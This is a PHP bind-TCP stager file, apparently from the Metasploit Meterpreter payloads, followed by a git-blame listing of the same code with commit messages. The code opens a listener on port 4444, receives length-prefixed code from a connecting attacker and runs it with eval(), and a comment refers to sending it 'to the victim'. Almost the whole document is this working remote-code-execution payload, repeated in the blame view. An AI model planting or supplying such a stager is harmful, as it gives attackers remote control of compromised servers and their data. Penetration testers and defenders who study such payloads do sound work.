data/php/bind_tcp.php

#<?php

# The payload handler overwrites this with the correct LPORT before sending
# it to the victim.
$port = 4444;
$ipaddr = "0.0.0.0";

if (is_callable('stream_socket_server')) {
	$srvsock = stream_socket_server("tcp://{$ipaddr}:{$port}");
	if (!$srvsock) { die(); }
	$s = stream_socket_accept($srvsock, -1);
	fclose($srvsock);
	$s_type = 'stream';
} elseif (is_callable('socket_create_listen')) {
	$srvsock = socket_create_listen(AF_INET, SOCK_STREAM, SOL_TCP);
	if (!$res) { die(); }
	$s = socket_accept($srvsock);
	socket_close($srvsock);
	$s_type = 'socket';
} elseif (is_callable('socket_create')) {
	$srvsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
	$res = socket_bind($srvsock, $ipaddr, $port);
	if (!$res) { die(); }
	$s = socket_accept($srvsock);
	socket_close($srvsock);
	$s_type = 'socket';
} else {
	die();
}
if (!$s) { die(); }

switch ($s_type) {
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
	# We failed on the main socket.  There's no way to continue, so
	# bail
	die();
}
$a = unpack("Nlen", $len);
$len = $a['len'];

$b = '';
while (strlen($b) < $len) {
	switch ($s_type) {
	case 'stream': $b .= fread($s, $len-strlen($b)); break;
	case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
	}
}

# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();
add a bind stager for php 2010-07-17 22:42:12 +00:00			`#<?php`

			`# The payload handler overwrites this with the correct LPORT before sending`
			`# it to the victim.`
			`$port = 4444;`
			`$ipaddr = "0.0.0.0";`

			`if (is_callable('stream_socket_server')) {`
			`$srvsock = stream_socket_server("tcp://{$ipaddr}:{$port}");`
			`if (!$srvsock) { die(); }`
move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone 2010-07-27 21:16:15 +00:00			`$s = stream_socket_accept($srvsock, -1);`
Close the server socket in php bind stager 2014-07-03 16:52:09 -05:00			`fclose($srvsock);`
move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone 2010-07-27 21:16:15 +00:00			`$s_type = 'stream';`
add a bind stager for php 2010-07-17 22:42:12 +00:00			`} elseif (is_callable('socket_create_listen')) {`
			`$srvsock = socket_create_listen(AF_INET, SOCK_STREAM, SOL_TCP);`
			`if (!$res) { die(); }`
move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone 2010-07-27 21:16:15 +00:00			`$s = socket_accept($srvsock);`
Close the server socket in php bind stager 2014-07-03 16:52:09 -05:00			`socket_close($srvsock);`
move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone 2010-07-27 21:16:15 +00:00			`$s_type = 'socket';`
add a bind stager for php 2010-07-17 22:42:12 +00:00			`} elseif (is_callable('socket_create')) {`
			`$srvsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);`
			`$res = socket_bind($srvsock, $ipaddr, $port);`
			`if (!$res) { die(); }`
move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone 2010-07-27 21:16:15 +00:00			`$s = socket_accept($srvsock);`
Close the server socket in php bind stager 2014-07-03 16:52:09 -05:00			`socket_close($srvsock);`
move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone 2010-07-27 21:16:15 +00:00			`$s_type = 'socket';`
add a bind stager for php 2010-07-17 22:42:12 +00:00			`} else {`
			`die();`
			`}`
move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone 2010-07-27 21:16:15 +00:00			`if (!$s) { die(); }`
add a bind stager for php 2010-07-17 22:42:12 +00:00
Close the server socket in php bind stager 2014-07-03 16:52:09 -05:00			`switch ($s_type) {`
move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone 2010-07-27 21:16:15 +00:00			`case 'stream': $len = fread($s, 4); break;`
			`case 'socket': $len = socket_read($s, 4); break;`
add a bind stager for php 2010-07-17 22:42:12 +00:00			`}`
			`if (!$len) {`
			`# We failed on the main socket. There's no way to continue, so`
			`# bail`
			`die();`
			`}`
			`$a = unpack("Nlen", $len);`
			`$len = $a['len'];`

move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone 2010-07-27 21:16:15 +00:00			`$b = '';`
			`while (strlen($b) < $len) {`
Close the server socket in php bind stager 2014-07-03 16:52:09 -05:00			`switch ($s_type) {`
move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone 2010-07-27 21:16:15 +00:00			`case 'stream': $b .= fread($s, $len-strlen($b)); break;`
			`case 'socket': $b .= socket_read($s, $len-strlen($b)); break;`
add a bind stager for php 2010-07-17 22:42:12 +00:00			`}`
			`}`

move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone 2010-07-27 21:16:15 +00:00			`# Set up the socket for the main stage to use.`
			`$GLOBALS['msgsock'] = $s;`
			`$GLOBALS['msgsock_type'] = $s_type;`
			`eval($b);`
add a bind stager for php 2010-07-17 22:42:12 +00:00			`die();`